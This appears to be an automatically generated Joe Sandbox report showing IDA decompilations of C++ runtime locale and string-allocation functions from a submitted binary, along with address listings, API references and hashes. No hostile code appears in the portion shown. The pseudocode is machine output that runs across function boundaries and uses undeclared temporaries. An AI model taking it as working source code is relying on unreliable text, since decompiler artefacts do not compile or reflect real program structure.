                                                • Instruction Fuzzy Hash: AD61C2B99087408FD711DF64D845B1BB7F5BFAA304F08482DF88997252EB30E949CB92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E001A59A0(void* __ebx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
                                                				intOrPtr _v0;
                                                				signed int _v8;
                                                				signed short _v12;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				signed int _v36;
                                                				intOrPtr* _v44;
                                                				char _v64;
                                                				char _v72;
                                                				char _v80;
                                                				signed short _v84;
                                                				signed short _v88;
                                                				char _v92;
                                                				char _v96;
                                                				char _v144;
                                                				signed short _v180;
                                                				signed short _v188;
                                                				char _v192;
                                                				signed short _v196;
                                                				intOrPtr* _v200;
                                                				signed short _v204;
                                                				signed short _v208;
                                                				signed short _v212;
                                                				signed short _v216;
                                                				signed short _v220;
                                                				char _v224;
                                                				short _v228;
                                                				signed short _v232;
                                                				char _v236;
                                                				signed short _v240;
                                                				char _v244;
                                                				signed short _v248;
                                                				char _v268;
                                                				intOrPtr _v272;
                                                				intOrPtr* _v280;
                                                				intOrPtr _v284;
                                                				char _v288;
                                                				char _v292;
                                                				void* __edi;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t89;
                                                				intOrPtr* _t91;
                                                				intOrPtr _t95;
                                                				signed int _t101;
                                                				signed short _t107;
                                                				intOrPtr* _t112;
                                                				void* _t123;
                                                				signed short _t127;
                                                				void* _t160;
                                                				intOrPtr* _t164;
                                                				void* _t169;
                                                				intOrPtr* _t170;
                                                				void* _t175;
                                                				signed int _t176;
                                                				intOrPtr _t181;
                                                				void* _t182;
                                                				intOrPtr _t183;
                                                				signed int _t185;
                                                				intOrPtr* _t186;
                                                				void* _t188;
                                                				void* _t189;
                                                				intOrPtr* _t190;
                                                				intOrPtr* _t191;
                                                				signed int _t195;
                                                				signed int _t197;
                                                				signed int _t198;
                                                
                                                				_t175 = __edx;
                                                				_t160 = __ebx;
                                                				_t197 = (_t195 & 0xfffffff0) - 0xf8;
                                                				_t89 =  *0x1d5010; // 0x8121a627
                                                				_v8 = _t89 ^ _t197;
                                                				_t91 = _a4;
                                                				_v200 = _t91;
                                                				_push(_t188);
                                                				_t181 = _a8;
                                                				if(_t91 == 0) {
                                                					L21:
                                                					_pop(_t182);
                                                					_pop(_t189);
                                                					return E001A9545(4, _t160, _v8 ^ _t197, _t175, _t182, _t189);
                                                				} else {
                                                					_t207 =  *_t91;
                                                					if( *_t91 != 0) {
                                                						goto L21;
                                                					} else {
                                                						_t190 = E001A9553(_t188, _t207, 0x18);
                                                						asm("xorps xmm0, xmm0");
                                                						_t198 = _t197 + 4;
                                                						asm("movups [esi], xmm0");
                                                						asm("movq [esi+0x10], xmm0");
                                                						_t95 =  *((intOrPtr*)(_t181 + 4));
                                                						if(_t95 == 0) {
                                                							_t183 = 0x1d245f;
                                                						} else {
                                                							_t183 =  *((intOrPtr*)(_t95 + 0x18));
                                                							if(_t183 == 0) {
                                                								_t183 = _t95 + 0x1c;
                                                							}
                                                						}
                                                						_t164 =  &_v248;
                                                						E001A612A(_t164, 0);
                                                						_v248 = 0;
                                                						_v244 = 0;
                                                						_v240 = 0;
                                                						_v236 = 0;
                                                						_v232 = 0;
                                                						_v228 = 0;
                                                						_v224 = 0;
                                                						_v220 = 0;
                                                						_v216 = 0;
                                                						_v212 = 0;
                                                						_v208 = 0;
                                                						_v204 = 0;
                                                						if(_t183 == 0) {
                                                							E001A62F1("bad locale name");
                                                							goto L23;
                                                						} else {
                                                							E001A657D(_t164,  &_v248, _t183);
                                                							 *(_t190 + 4) = 0;
                                                							 *_t190 = 0x1c814c;
                                                							E001AFAE1();
                                                							_t123 = E001A8EAF( &_v192);
                                                							asm("movups xmm0, [eax]");
                                                							asm("movups [esp+0xc0], xmm0");
                                                							asm("movups xmm0, [eax+0x10]");
                                                							asm("movups [esp+0xd0], xmm0");
                                                							asm("movq xmm0, [eax+0x20]");
                                                							asm("movq [esp+0xe0], xmm0");
                                                							_v24 =  *((intOrPtr*)(_t123 + 0x28));
                                                							 *(_t190 + 8) = 0;
                                                							 *(_t190 + 0x10) = 0;
                                                							 *(_t190 + 0x14) = 0;
                                                							E001A8EAF( &_v144);
                                                							_push(1);
                                                							_push(1);
                                                							_t127 = E001ADCC3();
                                                							_t198 = _t198 + 0x18;
                                                							if(_t127 == 0) {
                                                								L23:
                                                								E001A6294(__eflags);
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								asm("int3");
                                                								_push(0xffffffff);
                                                								_push(0x1c6850);
                                                								_push( *[fs:0x0]);
                                                								_push(_t160);
                                                								_push(_t190);
                                                								_push(_t183);
                                                								_t101 =  *0x1d5010; // 0x8121a627
                                                								_push(_t101 ^ _t198);
                                                								 *[fs:0x0] =  &_v268;
                                                								_v272 = _t198 - 0x18;
                                                								_t191 = _t164;
                                                								_v280 = _t191;
                                                								_v284 = 0;
                                                								E001A3A60( &_v292, _t191);
                                                								__eflags = _v288;
                                                								if(_v288 != 0) {
                                                									_v12 = 0;
                                                									_t107 = E001A49B0( *((intOrPtr*)( *((intOrPtr*)( *_t191 + 4)) + _t191 + 0x38)), _v0);
                                                									_t176 = 4;
                                                									__eflags = 0xffff - (_t107 & 0x0000ffff);
                                                									_t185 =  ==  ? 4 : 0;
                                                									_v36 = _t185;
                                                									_v12 = 0xffffffff;
                                                								} else {
                                                									_t185 = 4;
                                                									_t176 = 4;
                                                								}
                                                								_t169 =  *((intOrPtr*)( *_t191 + 4)) + _t191;
                                                								__eflags =  *((intOrPtr*)(_t169 + 0x38));
                                                								_t177 =  !=  ? 0 : _t176;
                                                								_t178 = ( !=  ? 0 : _t176) |  *(_t169 + 0xc);
                                                								_t179 = ( !=  ? 0 : _t176) |  *(_t169 + 0xc) | _t185;
                                                								E001A2130(_t169, ( !=  ? 0 : _t176) |  *(_t169 + 0xc) | _t185, 0);
                                                								_t112 = L001A6692();
                                                								_t186 = _v44;
                                                								__eflags = _t112;
                                                								if(_t112 == 0) {
                                                									E001A4710();
                                                								}
                                                								_t170 =  *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4)) + _t186 + 0x38));
                                                								__eflags = _t170;
                                                								if(_t170 != 0) {
                                                									 *((intOrPtr*)( *_t170 + 8))();
                                                								}
                                                								 *[fs:0x0] = _v20;
                                                								return _t191;
                                                							} else {
                                                								 *_t127 = 0;
                                                								 *(_t190 + 8) = _t127;
                                                								 *(_t190 + 0x10) = E001A1BD0(_t160, _t183, _t190, "false", 0,  &_v64);
                                                								 *(_t190 + 0x14) = E001A1BD0(_t160, _t183, _t190, "true", 0,  &_v64);
                                                								_v96 = 0x2e;
                                                								asm("xorps xmm0, xmm0");
                                                								_v84 = 0;
                                                								asm("movlpd [esp+0xb0], xmm0");
                                                								E001A5F74(_t164,  &_v84,  &_v96, 1,  &_v80,  &_v64);
                                                								 *((short*)(_t190 + 0xc)) = _v84 & 0x0000ffff;
                                                								asm("xorps xmm0, xmm0");
                                                								_v92 = 0x2c;
                                                								_v88 = 0;
                                                								asm("movlpd [esp+0xbc], xmm0");
                                                								E001A5F74(_t164,  &_v88,  &_v92, 1,  &_v72,  &_v64);
                                                								 *((short*)(_t190 + 0xe)) = _v88 & 0x0000ffff;
                                                								 *_v196 = _t190;
                                                								E001A65C8(_t164,  &_v248);
                                                								_t147 = _v204;
                                                								_t197 = _t198 + 0x44;
                                                								if(_v204 != 0) {
                                                									E001AFB09(_t147);
                                                									_t197 = _t197 + 4;
                                                								}
                                                								_t148 = _v188;
                                                								_v180 = 0;
                                                								if(_v188 != 0) {
                                                									E001AFB09(_t148);
                                                									_t197 = _t197 + 4;
                                                								}
                                                								_t149 = _v196;
                                                								_v188 = 0;
                                                								if(_v196 != 0) {
                                                									E001AFB09(_t149);
                                                									_t197 = _t197 + 4;
                                                								}
                                                								_t150 = _v204;
                                                								_v196 = 0;
                                                								if(_v204 != 0) {
                                                									E001AFB09(_t150);
                                                									_t197 = _t197 + 4;
                                                								}
                                                								_t151 = _v212;
                                                								_v204 = 0;
                                                								if(_v212 != 0) {
                                                									E001AFB09(_t151);
                                                									_t197 = _t197 + 4;
                                                								}
                                                								_t152 = _v220;
                                                								_v212 = 0;
                                                								if(_v220 != 0) {
                                                									E001AFB09(_t152);
                                                									_t197 = _t197 + 4;
                                                								}
                                                								_v220 = 0;
                                                								E001A6182( &_v224);
                                                								goto L21;
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}






































































                                                0x001a59a0
                                                0x001a59a0
                                                0x001a59a6
                                                0x001a59ac
                                                0x001a59b3
                                                0x001a59ba
                                                0x001a59bd
                                                0x001a59c1
                                                0x001a59c3
                                                0x001a59c8
                                                0x001a5c80
                                                0x001a5c8c
                                                0x001a5c8d
                                                0x001a5c98
                                                0x001a59ce
                                                0x001a59ce
                                                0x001a59d1
                                                0x00000000
                                                0x001a59d7
                                                0x001a59de
                                                0x001a59e0
                                                0x001a59e3
                                                0x001a59e6
                                                0x001a59e9
                                                0x001a59ee
                                                0x001a59f3
                                                0x001a5a01
                                                0x001a59f5
                                                0x001a59f5
                                                0x001a59fa
                                                0x001a59fc
                                                0x001a59fc
                                                0x001a59fa
                                                0x001a5a08
                                                0x001a5a0c
                                                0x001a5a13
                                                0x001a5a1b
                                                0x001a5a20
                                                0x001a5a28
                                                0x001a5a2d
                                                0x001a5a35
                                                0x001a5a3a
                                                0x001a5a3e
                                                0x001a5a43
                                                0x001a5a47
                                                0x001a5a4b
                                                0x001a5a4f
                                                0x001a5a55
                                                0x001a5c9e
                                                0x00000000
                                                0x001a5a5b
                                                0x001a5a61
                                                0x001a5a66
                                                0x001a5a6d
                                                0x001a5a73
                                                0x001a5a7d
                                                0x001a5a85
                                                0x001a5a88
                                                0x001a5a90
                                                0x001a5a94
                                                0x001a5a9c
                                                0x001a5aa1
                                                0x001a5aad
                                                0x001a5ab9
                                                0x001a5ac0
                                                0x001a5ac7
                                                0x001a5ace
                                                0x001a5ad6
                                                0x001a5ad8
                                                0x001a5ada
                                                0x001a5adf
                                                0x001a5ae4
                                                0x001a5ca3
                                                0x001a5ca3
                                                0x001a5ca8
                                                0x001a5ca9
                                                0x001a5caa
                                                0x001a5cab
                                                0x001a5cac
                                                0x001a5cad
                                                0x001a5cae
                                                0x001a5caf
                                                0x001a5cb3
                                                0x001a5cb5
                                                0x001a5cc0
                                                0x001a5cc4
                                                0x001a5cc5
                                                0x001a5cc6
                                                0x001a5cc7
                                                0x001a5cce
                                                0x001a5cd2
                                                0x001a5cd8
                                                0x001a5cdb
                                                0x001a5cdd
                                                0x001a5ce2
                                                0x001a5ce9
                                                0x001a5cee
                                                0x001a5cf2
                                                0x001a5cfd
                                                0x001a5d10
                                                0x001a5d1d
                                                0x001a5d22
                                                0x001a5d25
                                                0x001a5d28
                                                0x001a5d2b
                                                0x001a5cf4
                                                0x001a5cf4
                                                0x001a5cf9
                                                0x001a5cf9
                                                0x001a5d64
                                                0x001a5d6a
                                                0x001a5d6d
                                                0x001a5d70
                                                0x001a5d73
                                                0x001a5d76
                                                0x001a5d7b
                                                0x001a5d80
                                                0x001a5d83
                                                0x001a5d85
                                                0x001a5d89
                                                0x001a5d89
                                                0x001a5d93
                                                0x001a5d97
                                                0x001a5d99
                                                0x001a5d9d
                                                0x001a5d9d
                                                0x001a5da5
                                                0x001a5db3
                                                0x001a5aea
                                                0x001a5aea
                                                0x001a5aed
                                                0x001a5b07
                                                0x001a5b21
                                                0x001a5b2b
                                                0x001a5b33
                                                0x001a5b36
                                                0x001a5b41
                                                0x001a5b65
                                                0x001a5b75
                                                0x001a5b79
                                                0x001a5b83
                                                0x001a5b8b
                                                0x001a5b9e
                                                0x001a5bba
                                                0x001a5bca
                                                0x001a5bd2
                                                0x001a5bd9
                                                0x001a5bde
                                                0x001a5be2
                                                0x001a5be7
                                                0x001a5bea
                                                0x001a5bef
                                                0x001a5bef
                                                0x001a5bf2
                                                0x001a5bf6
                                                0x001a5c00
                                                0x001a5c03
                                                0x001a5c08
                                                0x001a5c08
                                                0x001a5c0b
                                                0x001a5c0f
                                                0x001a5c19
                                                0x001a5c1c
                                                0x001a5c21
                                                0x001a5c21
                                                0x001a5c24
                                                0x001a5c28
                                                0x001a5c32
                                                0x001a5c35
                                                0x001a5c3a
                                                0x001a5c3a
                                                0x001a5c3d
                                                0x001a5c41
                                                0x001a5c4b
                                                0x001a5c4e
                                                0x001a5c53
                                                0x001a5c53
                                                0x001a5c56
                                                0x001a5c5a
                                                0x001a5c64
                                                0x001a5c67
                                                0x001a5c6c
                                                0x001a5c6c
                                                0x001a5c73
                                                0x001a5c7b
                                                0x00000000
                                                0x001a5c7b
                                                0x001a5ae4
                                                0x001a5a55
                                                0x001a59d1

                                                APIs
                                                • std::_Lockit::_Lockit.LIBCPMT ref: 001A5A0C
                                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 001A5A61
                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 001A5BD9
                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 001A5C7B
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 001A5CA3
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.347566264.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                • Associated: 00000000.00000002.347556970.00000000001A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347669983.00000000001C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347813163.00000000001D5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.347876847.0000000000204000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_1a0000_file.jbxd
                                                Similarity
                                                • API ID: std::_$Locinfo::_Lockit$Concurrency::cancel_current_taskLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                • String ID: ,$.$bad locale name$false$true
                                                • API String ID: 3204333896-3659324578
                                                • Opcode ID: 843980948b6cb82d6e77c2a1fb277446ffa1125cf7ca64141b7c6fd2bc5bec99
                                                • Instruction ID: 7be39104b698c7c107c12f0df43d0e45e186645a6bcd82eddfa0178692546f99
                                                • Opcode Fuzzy Hash: 843980948b6cb82d6e77c2a1fb277446ffa1125cf7ca64141b7c6fd2bc5bec99
                                                • Instruction Fuzzy Hash: 538173B59087809FE720DF64C941B9BB7E8AF96314F044A2DF98897241F774E548CBA3
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E001A4EB0(void* __ebx, void* __edx, void* __edi, signed int* _a4, signed int _a16, signed int _a20) {
                                                				signed int _v4;
                                                				char _v8;
                                                				char _v12;
                                                				intOrPtr _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				signed int _v48;
                                                				signed int _v52;
                                                				signed int _v56;
                                                				signed int _v60;
                                                				signed int _v64;
                                                				signed int _v72;
                                                				signed int _v76;
                                                				signed int _v84;
                                                				intOrPtr _v88;
                                                				signed int _v92;
                                                				char _v96;
                                                				char _v100;
                                                				signed int _v104;
                                                				char _v108;
                                                				signed int _v112;
                                                				void* _v120;
                                                				signed int _v128;
                                                				signed int _v132;
                                                				signed int _v136;
                                                				char _v140;
                                                				char _v144;
                                                				void* _v148;
                                                				void* _v196;
                                                				void* _v212;
                                                				signed int _v220;
                                                				signed int _v224;
                                                				signed int _v228;
                                                				signed int _v232;
                                                				signed int _v236;
                                                				signed int _v240;
                                                				signed int _v244;
                                                				signed int _v248;
                                                				signed int _v252;
                                                				signed int _v256;
                                                				signed int _v260;
                                                				signed int _v264;
                                                				void* _v268;
                                                				intOrPtr _v276;
                                                				void* _v280;
                                                				void* __esi;
                                                				signed int _t174;
                                                				signed int _t182;
                                                				signed int _t188;
                                                				void* _t195;
                                                				signed int _t202;
                                                				signed int _t210;
                                                				intOrPtr _t214;
                                                				signed int _t219;
                                                				void* _t228;
                                                				signed int _t232;
                                                				signed int _t233;
                                                				signed int _t234;
                                                				signed int _t235;
                                                				signed int _t236;
                                                				signed int _t237;
                                                				void* _t248;
                                                				signed int _t253;
                                                				signed int _t254;
                                                				signed int _t255;
                                                				unsigned int _t257;
                                                				void* _t258;
                                                				signed int _t272;
                                                				signed int _t274;
                                                				void* _t278;
                                                				signed int _t283;
                                                				signed int _t284;
                                                				void* _t288;
                                                				signed int _t294;
                                                				signed int _t295;
                                                				signed int _t296;
                                                				signed int _t297;
                                                				signed int _t298;
                                                				signed int _t299;
                                                				void* _t310;
                                                				signed int _t315;
                                                				signed int _t316;
                                                				signed int* _t318;
                                                				signed int _t319;
                                                				void* _t320;
                                                				signed int _t321;
                                                				void* _t322;
                                                				signed int* _t323;
                                                				signed int _t324;
                                                				signed int _t325;
                                                				void* _t326;
                                                				signed int _t330;
                                                				signed int _t331;
                                                				intOrPtr _t334;
                                                				intOrPtr* _t338;
                                                				signed int* _t340;
                                                				intOrPtr _t346;
                                                				intOrPtr _t351;
                                                				signed int _t359;
                                                				void* _t361;
                                                				signed int _t372;
                                                				intOrPtr _t373;
                                                				signed int _t375;
                                                				void* _t376;
                                                				signed int _t377;
                                                				signed int _t378;
                                                				signed int _t379;
                                                				void* _t380;
                                                				signed int _t381;
                                                				void* _t382;
                                                				signed int _t383;
                                                				signed int _t385;
                                                				signed int _t388;
                                                				signed int _t393;
                                                				void* _t394;
                                                				signed int _t395;
                                                				void* _t396;
                                                				signed int _t397;
                                                				void* _t398;
                                                				signed int _t399;
                                                				intOrPtr _t405;
                                                				signed int _t408;
                                                				intOrPtr* _t410;
                                                				signed int _t412;
                                                				signed int _t414;
                                                				signed int _t415;
                                                				void* _t423;
                                                				signed int _t424;
                                                				void* _t426;
                                                				signed int _t427;
                                                				void* _t429;
                                                				void* _t430;
                                                				signed int _t431;
                                                				void* _t433;
                                                				void* _t436;
                                                				void* _t438;
                                                				void* _t445;
                                                				void* _t447;
                                                
                                                				_t371 = __edx;
                                                				_t424 = _t423 - 0x44;
                                                				_t174 =  *0x1d5010; // 0x8121a627
                                                				_v4 = _t174 ^ _t424;
                                                				_push(__ebx);
                                                				_t318 = _a4;
                                                				_push(__edi);
                                                				_v16 = _t318;
                                                				E001A612A( &_v12, 0);
                                                				_t375 =  *0x203588; // 0x3
                                                				_t408 =  *0x203574; // 0xb17f38
                                                				if(_t375 == 0) {
                                                					E001A612A( &_v8, _t375);
                                                					_t447 =  *0x203588 - _t375; // 0x3
                                                					if(_t447 == 0) {
                                                						_t315 =  *0x202708; // 0x4
                                                						_t316 = _t315 + 1;
                                                						 *0x202708 = _t316;
                                                						 *0x203588 = _t316;
                                                					}
                                                					E001A6182( &_v8);
                                                					_t375 =  *0x203588; // 0x3
                                                				}
                                                				_t334 =  *((intOrPtr*)(_t318 + 4));
                                                				_t319 = _t375 * 4;
                                                				if(_t375 >=  *((intOrPtr*)(_t334 + 0xc))) {
                                                					_t393 = 0;
                                                					__eflags = 0;
                                                					goto L8;
                                                				} else {
                                                					_t393 =  *(_t319 +  *((intOrPtr*)(_t334 + 8)));
                                                					if(_t393 == 0) {
                                                						L8:
                                                						__eflags =  *((char*)(_t334 + 0x14));
                                                						if( *((char*)(_t334 + 0x14)) == 0) {
                                                							L11:
                                                							__eflags = _t393;
                                                							if(_t393 != 0) {
                                                								goto L6;
                                                							} else {
                                                								goto L12;
                                                							}
                                                						} else {
                                                							_t310 = E001A6477();
                                                							__eflags = _t375 -  *((intOrPtr*)(_t310 + 0xc));
                                                							if(_t375 >=  *((intOrPtr*)(_t310 + 0xc))) {
                                                								L12:
                                                								__eflags = _t408;
                                                								if(__eflags == 0) {
                                                									_t393 = E001A9553(_t393, __eflags, 8);
                                                									_t426 = _t424 + 4;
                                                									_t182 =  *(_v16 + 4);
                                                									__eflags = _t182;
                                                									if(_t182 == 0) {
                                                										_t377 = 0x1d245f;
                                                									} else {
                                                										_t377 =  *(_t182 + 0x18);
                                                										__eflags = _t377;
                                                										if(_t377 == 0) {
                                                											_t377 = _t182 + 0x1c;
                                                										}
                                                									}
                                                									_t338 =  &_v64;
                                                									E001A612A(_t338, 0);
                                                									_v64 = 0;
                                                									_v60 = 0;
                                                									_v56 = 0;
                                                									_v52 = 0;
                                                									_v48 = 0;
                                                									_v44 = 0;
                                                									_v40 = 0;
                                                									_v36 = 0;
                                                									_v32 = 0;
                                                									_v28 = 0;
                                                									_v24 = 0;
                                                									_v20 = 0;
                                                									__eflags = _t377;
                                                									if(_t377 == 0) {
                                                										E001A62F1("bad locale name");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										asm("int3");
                                                										_push(_t338);
                                                										_t186 = _v76;
                                                										_push(_t408);
                                                										_push(_t377);
                                                										_t378 = _v72;
                                                										_t410 = _t338;
                                                										_v84 = _v76;
                                                										__eflags = _t378 - 0x7fffffff;
                                                										if(__eflags > 0) {
                                                											E001A13F0(_t338, __eflags);
                                                											asm("int3");
                                                											asm("int3");
                                                											asm("int3");
                                                											asm("int3");
                                                											_t427 = _t426 - 0x18;
                                                											_t188 =  *0x1d5010; // 0x8121a627
                                                											_v92 = _t188 ^ _t427;
                                                											_push(_t319);
                                                											_push(_t410);
                                                											_push(_t393);
                                                											_push(_t378);
                                                											_v104 = _v84;
                                                											E001A612A( &_v96, 0);
                                                											_t379 =  *0x203578; // 0x4
                                                											_t321 =  *0x20356c; // 0xb13410
                                                											_v112 = _t321;
                                                											__eflags = _t379;
                                                											if(_t379 == 0) {
                                                												E001A612A( &_v100, _t379);
                                                												__eflags =  *0x203578 - _t379; // 0x4
                                                												if(__eflags == 0) {
                                                													_t283 =  *0x202708; // 0x4
                                                													_t284 = _t283 + 1;
                                                													__eflags = _t284;
                                                													 *0x202708 = _t284;
                                                													 *0x203578 = _t284;
                                                												}
                                                												E001A6182( &_v100);
                                                												_t379 =  *0x203578; // 0x4
                                                											}
                                                											_t340 = _a4;
                                                											_t412 = _t379 * 4;
                                                											__eflags = _t379 - _t340[3];
                                                											if(_t379 >= _t340[3]) {
                                                												_t395 = 0;
                                                												__eflags = 0;
                                                												goto L49;
                                                											} else {
                                                												_t395 =  *(_t340[2] + _t412);
                                                												__eflags = _t395;
                                                												if(_t395 != 0) {
                                                													L57:
                                                													E001A6182( &_v96);
                                                													_pop(_t380);
                                                													_pop(_t396);
                                                													_pop(_t322);
                                                													__eflags = _v92 ^ _t427;
                                                													return E001A9545(_t395, _t322, _v92 ^ _t427, _t371, _t380, _t396);
                                                												} else {
                                                													L49:
                                                													__eflags = _t340[5];
                                                													if(_t340[5] == 0) {
                                                														L52:
                                                														__eflags = _t395;
                                                														if(_t395 != 0) {
                                                															goto L57;
                                                														} else {
                                                															goto L53;
                                                														}
                                                													} else {
                                                														_t278 = E001A6477();
                                                														__eflags = _t379 -  *((intOrPtr*)(_t278 + 0xc));
                                                														if(_t379 >=  *((intOrPtr*)(_t278 + 0xc))) {
                                                															L53:
                                                															__eflags = _t321;
                                                															if(_t321 == 0) {
                                                																_push(_v104);
                                                																_t195 = E001A59A0(_t321, _t371,  &_v108);
                                                																_t429 = _t427 + 8;
                                                																__eflags = _t195 - 0xffffffff;
                                                																if(__eflags == 0) {
                                                																	E001A1910();
                                                																	asm("int3");
                                                																	asm("int3");
                                                																	asm("int3");
                                                																	asm("int3");
                                                																	_t430 = _t429 - 0xc;
                                                																	_t372 =  *(_t430 + 0x10);
                                                																	_push(_t321);
                                                																	_t323 = _t340;
                                                																	 *((intOrPtr*)(_t430 + 0xc)) = _v108;
                                                																	_push(_t412);
                                                																	_t414 = _t323[4];
                                                																	__eflags = 0x7fffffff - _t414 - _t372;
                                                																	if(__eflags < 0) {
                                                																		E001A13F0(0x7fffffff, __eflags);
                                                																		goto L80;
                                                																	} else {
                                                																		_push(_t395);
                                                																		_t395 = _t323[5];
                                                																		_t255 = _t372 + _t414;
                                                																		_push(_t379);
                                                																		_v132 = _t255;
                                                																		_t385 = _t255 | 0x0000000f;
                                                																		_v128 = _t395;
                                                																		__eflags = _t385 - 0x7fffffff;
                                                																		if(_t385 <= 0x7fffffff) {
                                                																			_t257 = _t395 >> 1;
                                                																			__eflags = _t395 - 0x7fffffff - _t257;
                                                																			if(_t395 <= 0x7fffffff - _t257) {
                                                																				_t258 = _t257 + _t395;
                                                																				__eflags = _t385 - _t258;
                                                																				_t379 =  <  ? _t258 : _t385;
                                                																				_t94 = _t379 + 1; // 0x80000000
                                                																				_t359 = _t94;
                                                																				__eflags = _t359 - 0x1000;
                                                																				if(_t359 < 0x1000) {
                                                																					__eflags = _t359;
                                                																					if(__eflags == 0) {
                                                																						_t395 = 0;
                                                																						__eflags = 0;
                                                																					} else {
                                                																						_t272 = E001A9553(_t395, __eflags, _t359);
                                                																						_t430 = _t430 + 4;
                                                																						_t395 = _t272;
                                                																					}
                                                																					goto L73;
                                                																				} else {
                                                																					_t95 = _t359 + 0x23; // 0x80000023
                                                																					_t273 = _t95;
                                                																					__eflags = _t95 - _t359;
                                                																					if(__eflags <= 0) {
                                                																						L80:
                                                																						E001A1370();
                                                																						goto L81;
                                                																					} else {
                                                																						goto L63;
                                                																					}
                                                																				}
                                                																			} else {
                                                																				_t379 = 0x7fffffff;
                                                																				goto L62;
                                                																			}
                                                																		} else {
                                                																			_t379 = 0x7fffffff;
                                                																			L62:
                                                																			_t273 = 0xffffffff80000023;
                                                																			__eflags = 0x80000000;
                                                																			L63:
                                                																			_t274 = E001A9553(_t395, __eflags, _t273);
                                                																			_t430 = _t430 + 4;
                                                																			__eflags = _t274;
                                                																			if(_t274 == 0) {
                                                																				L81:
                                                																				L121();
                                                																				asm("int3");
                                                																				_t431 = _t430 - 0x88;
                                                																				_t202 =  *0x1d5010; // 0x8121a627
                                                																				_v136 = _t202 ^ _t431;
                                                																				_push(_t323);
                                                																				_t324 = _v128;
                                                																				_push(_t414);
                                                																				_push(_t395);
                                                																				_push(_t379);
                                                																				 *((intOrPtr*)(_t431 + 0x48)) = _t324;
                                                																				E001A612A( &_v144, 0);
                                                																				_t381 =  *0x20271c; // 0x1
                                                																				_t415 =  *0x203570; // 0xb12ad8
                                                																				__eflags = _t381;
                                                																				if(_t381 == 0) {
                                                																					E001A612A( &_v140, _t381);
                                                																					__eflags =  *0x20271c - _t381; // 0x1
                                                																					if(__eflags == 0) {
                                                																						_t253 =  *0x202708; // 0x4
                                                																						_t254 = _t253 + 1;
                                                																						__eflags = _t254;
                                                																						 *0x202708 = _t254;
                                                																						 *0x20271c = _t254;
                                                																					}
                                                																					E001A6182( &_v140);
                                                																					_t381 =  *0x20271c; // 0x1
                                                																				}
                                                																				_t346 =  *((intOrPtr*)(_t324 + 4));
                                                																				_t325 = _t381 * 4;
                                                																				__eflags = _t381 -  *((intOrPtr*)(_t346 + 0xc));
                                                																				if(_t381 >=  *((intOrPtr*)(_t346 + 0xc))) {
                                                																					_t397 = 0;
                                                																					__eflags = 0;
                                                																					goto L90;
                                                																				} else {
                                                																					_t397 =  *(_t325 +  *((intOrPtr*)(_t346 + 8)));
                                                																					__eflags = _t397;
                                                																					if(_t397 == 0) {
                                                																						L90:
                                                																						__eflags =  *((char*)(_t346 + 0x14));
                                                																						if( *((char*)(_t346 + 0x14)) == 0) {
                                                																							L93:
                                                																							__eflags = _t397;
                                                																							if(_t397 != 0) {
                                                																								goto L88;
                                                																							} else {
                                                																								goto L94;
                                                																							}
                                                																						} else {
                                                																							_t248 = E001A6477();
                                                																							__eflags = _t381 -  *((intOrPtr*)(_t248 + 0xc));
                                                																							if(_t381 >=  *((intOrPtr*)(_t248 + 0xc))) {
                                                																								L94:
                                                																								__eflags = _t415;
                                                																								if(__eflags == 0) {
                                                																									_t397 = E001A9553(_t397, __eflags, 0x44);
                                                																									_t433 = _t431 + 4;
                                                																									_t210 =  *( *((intOrPtr*)(_t433 + 0x44)) + 4);
                                                																									__eflags = _t210;
                                                																									if(_t210 == 0) {
                                                																										_t383 = 0x1d245f;
                                                																									} else {
                                                																										_t383 =  *(_t210 + 0x18);
                                                																										__eflags = _t383;
                                                																										if(_t383 == 0) {
                                                																											_t383 = _t210 + 0x1c;
                                                																										}
                                                																									}
                                                																									E001A612A( &_v264, 0);
                                                																									_v264 = 0;
                                                																									_v260 = 0;
                                                																									_v256 = 0;
                                                																									_v252 = 0;
                                                																									_v248 = 0;
                                                																									_v244 = 0;
                                                																									_v240 = 0;
                                                																									_v236 = 0;
                                                																									_v232 = 0;
                                                																									_v228 = 0;
                                                																									_v224 = 0;
                                                																									_v220 = 0;
                                                																									__eflags = _t383;
                                                																									if(_t383 == 0) {
                                                																										E001A62F1("bad locale name");
                                                																										asm("int3");
                                                																										asm("int3");
                                                																										asm("int3");
                                                																										asm("int3");
                                                																										asm("int3");
                                                																										asm("int3");
                                                																										asm("int3");
                                                																										asm("int3");
                                                																										asm("int3");
                                                																										asm("int3");
                                                																										asm("int3");
                                                																										asm("int3");
                                                																										asm("int3");
                                                																										asm("int3");
                                                																										_t351 =  *((intOrPtr*)(_t433 + 8));
                                                																										_t214 = _v276;
                                                																										__eflags = _t351 - 0x1000;
                                                																										if(_t351 < 0x1000) {
                                                																											L118:
                                                																											 *((intOrPtr*)(_t433 + 8)) = _t351;
                                                																											_v276 = _t214;
                                                																											_push(_t415);
